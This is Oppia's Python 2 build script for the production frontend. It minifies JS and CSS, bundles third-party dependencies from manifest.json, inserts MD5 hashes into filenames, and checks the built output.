build.py
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
# pylint: disable=invalid-name
import collections
import fnmatch
import hashlib
import json
import optparse
import os
import re
import shutil
import subprocess
import threading
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
FONTS_RELATIVE_DIRECTORY_PATH = os.path.join('fonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', 'dev', 'head', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', 'dev', 'head', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', 'head', ''),
'out_dir': os.path.join('build', 'templates', 'head', '')
}
HASHES_JS_FILENAME = 'hashes.js'
HASHES_JS_FILEPATH = os.path.join(ASSETS_DEV_DIR, HASHES_JS_FILENAME)
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
'..', 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
NODE_FILE = os.path.join(
PARENT_DIR, 'oppia_tools', 'node-6.9.1', 'bin', 'node')
UGLIFY_FILE = os.path.join(
PARENT_DIR, 'node_modules', 'uglify-js', 'bin', 'uglifyjs')
# Files with these extensions shouldn't be moved to build directory.
FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc')
# Files with these name patterns shouldn't be moved to build directory, and will
# not be served in production. (This includes protractor.js files in
# /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc')
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files or should not be moved to the build directory.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/fonts/*',
'third_party/generated/js/third_party.min.js.map')
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*_directive.html', '*.png', '*.json')
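# Size of the chunks (1 MiB) read at a time when hashing file contents in
# generate_md5_hash() below.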
HASH_BLOCK_SIZE = 2**20
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
cmd = 'java -jar %s %s -o %s' % (
YUICOMPRESSOR_DIR, source_path, target_path)
subprocess.check_call(cmd, shell=True)
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(content)
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with open(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
print 'Minifying and creating sourcemap for %s' % source_path
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
NODE_FILE, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to
ensure exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError: One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
    NOTE: shutil.copyfile does not accept directory paths as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for _, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(first_dir_path, second_dir_path):
"""Ensure that two dir's file counts match.
Args:
first_dir_path: str. First directory to compare.
second_dir_path: str. Second directory to compare.
Raises:
ValueError: The source directory does not have the same file count as
the target directory.
"""
first_dir_file_count = get_file_count(first_dir_path)
second_dir_file_count = get_file_count(second_dir_path)
if first_dir_file_count != second_dir_file_count:
print 'Comparing %s vs %s' % (first_dir_path, second_dir_path)
raise ValueError(
'%s files in first dir != %s files in second dir' % (
first_dir_file_count, second_dir_file_count))
def process_html(source_file_stream, target_file_stream, file_hashes):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
content = source_file_stream.read()
for filepath, file_hash in file_hashes.iteritems():
        # We insert the hash into all file paths except HTML paths. This is
        # because HTML paths are used by the backend, which works with paths
        # that do not contain the hash.
if not filepath.endswith('.html'):
filepath_with_hash = _insert_hash(filepath, file_hash)
content = content.replace(
'%s%s' % (TEMPLATES_DEV_DIR, filepath),
'%s%s' % (
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
filepath_with_hash))
content = content.replace(
'%s%s' % (ASSETS_DEV_DIR, filepath),
'%s%s' % (ASSETS_OUT_DIR, filepath_with_hash))
content = content.replace(
'%s%s' % (EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'], filepath),
'%s%s' % (
EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
filepath_with_hash))
content = content.replace(
'%s%s' % (THIRD_PARTY_GENERATED_DEV_DIR, filepath),
'%s%s' % (THIRD_PARTY_GENERATED_OUT_DIR, filepath_with_hash))
content = REMOVE_WS(' ', content)
write_to_file_stream(target_file_stream, content)
def get_dependency_directory(dependency):
"""Get dependency directory from dependecy dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain directory path to /font inside dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
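# get_dependencies_filepaths() below reads manifest.json. For orientation, a
# frontend dependency entry in that file is expected to look roughly like the
# following sketch (names and versions here are illustrative, not taken from
# the actual manifest):
#
#     "frontend": {
#         "someLib": {
#             "version": "1.2.3",
#             "targetDirPrefix": "someLib-",
#             "bundle": {
#                 "js": ["someLib.min.js"],
#                 "css": ["someLib.min.css"],
#                 "fontsPath": "fonts/"
#             }
#         }
#     }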
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with open(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
MINIFIED_THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
MINIFIED_THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
THIRD_PARTY_JS_FILEPATH, MINIFIED_THIRD_PARTY_JS_FILEPATH)
_minify(THIRD_PARTY_CSS_FILEPATH, MINIFIED_THIRD_PARTY_CSS_FILEPATH)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(THIRD_PARTY_JS_FILEPATH)
safe_delete_file(THIRD_PARTY_CSS_FILEPATH)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
print 'Building third party libs at %s' % third_party_directory_path
THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
FONTS_DIR = os.path.join(
third_party_directory_path, FONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(THIRD_PARTY_JS_FILEPATH)
with open(THIRD_PARTY_JS_FILEPATH, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(THIRD_PARTY_CSS_FILEPATH)
with open(THIRD_PARTY_CSS_FILEPATH, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(FONTS_DIR)
_execute_tasks(
_generate_copy_tasks_for_fonts(
dependency_filepaths['fonts'], FONTS_DIR))
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE, else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
        filepath: str. Path relative to the directory we are currently
            building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return not any(
filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
print 'Processing %s' % os.path.join(os.getcwd(), source)
print 'Copying into %s' % os.path.join(os.getcwd(), target)
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
print 'Copying %s' % os.path.join(root, directory)
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
relative_path = os.path.relpath(source_path, source)
if hash_should_be_inserted(source + relative_path):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with open(filepath, 'rb') as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filename) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
print('Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, dirnames, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for directory in dirnames:
print('Computing hashes for files in %s'
% os.path.join(root, directory))
for filename in filenames:
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
complete_filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(
complete_filepath, directory_path)
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.iteritems():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
def get_hashes_json_file_contents(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
str. JS code loading hashes as JSON into variable.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
hashes_json = json.dumps(filtered_hashes)
return 'var hashes = JSON.parse(\'%s\');' % (hashes_json)
def minify_func(source_path, target_path, file_hashes, filename):
"""Call the appropriate functions to handle different types of file
formats:
    - HTML files: Remove whitespace, interpolate paths in the HTML to include
        hashes, and save the edited file to the target directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
if filename.endswith('.html'):
print 'Building %s' % source_path
with open(source_path, 'r+') as source_html_file:
with open(target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file, file_hashes)
elif filename.endswith('.css') or filename.endswith('.js'):
print 'Minifying %s' % source_path
_minify(source_path, target_path)
else:
print 'Copying %s' % source_path
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError as threadAlreadyStarted:
raise OSError(threadAlreadyStarted.message)
def generate_build_tasks_to_build_all_files_in_directory(
source, target, file_hashes):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
print 'Processing %s' % os.path.join(os.getcwd(), source)
print 'Generating into %s' % os.path.join(os.getcwd(), target)
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
print 'Building directory %s' % os.path.join(root, directory)
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, file_hashes, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths, file_hashes):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
        if should_file_be_built(source_file_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, file_hashes, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict i.e. remaining files in staging
directory that have since been deleted from source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
    print 'Scanning directory %s to remove deleted files' % staging_directory
delete_tasks = collections.deque()
for root, dirnames, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for directory in dirnames:
print 'Scanning %s' % os.path.join(root, directory)
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
relative_path = os.path.relpath(target_path, staging_directory)
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
print ('Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
built or already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
    # Hashes are computed from each file's contents and are inserted between
    # the filename and its extension,
    # e.g. base.240933e7564bd72a4dde42ee23260c5f.html.
    # If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
FILE_EXTENSIONS_NOT_TO_TRACK = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.iteritems():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_NOT_TO_TRACK):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
                # A file with the expected hash cannot be found; this file
                # has been changed or created since the last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
print ('The following files will be rebuilt due to recent changes: %s' %
recently_changed_filenames)
return recently_changed_filenames
def generate_build_tasks_to_build_directory(dirnames_dict, file_hashes):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
print 'Creating new %s folder' % staging_dir
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir, file_hashes)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
print (
'Staging dir exists, re-building all %s files'
% str(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild, file_hashes)
dev_dir_hashes = get_file_hashes(source_dir)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
dev_dir_hashes, staging_dir))
print 'Getting files that have changed between %s and %s' % (
source_dir, out_dir)
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
print 'Re-building recently changed files at %s' % source_dir
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames,
file_hashes)
else:
print 'No changes detected. Using previously built files.'
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError: The hash dict is empty.
ValueError: Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError: The filename does not contain hash.
KeyError: The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# head/pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
def _verify_build(input_dirnames, output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
1) Number of files between source directory and final directory
matches.
    2) The hashes in filenames belong to the hash dict.
3) hashes.js, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
input_dirnames: list(str). List of directory paths that contain
source files.
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
for i in xrange(len(input_dirnames)):
        # Make sure that all files in the source directory are accounted for
        # in the corresponding output directory.
_compare_file_count(input_dirnames[i], output_dirnames[i])
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JS_FILENAME, file_hashes[HASHES_JS_FILENAME])
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH])
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
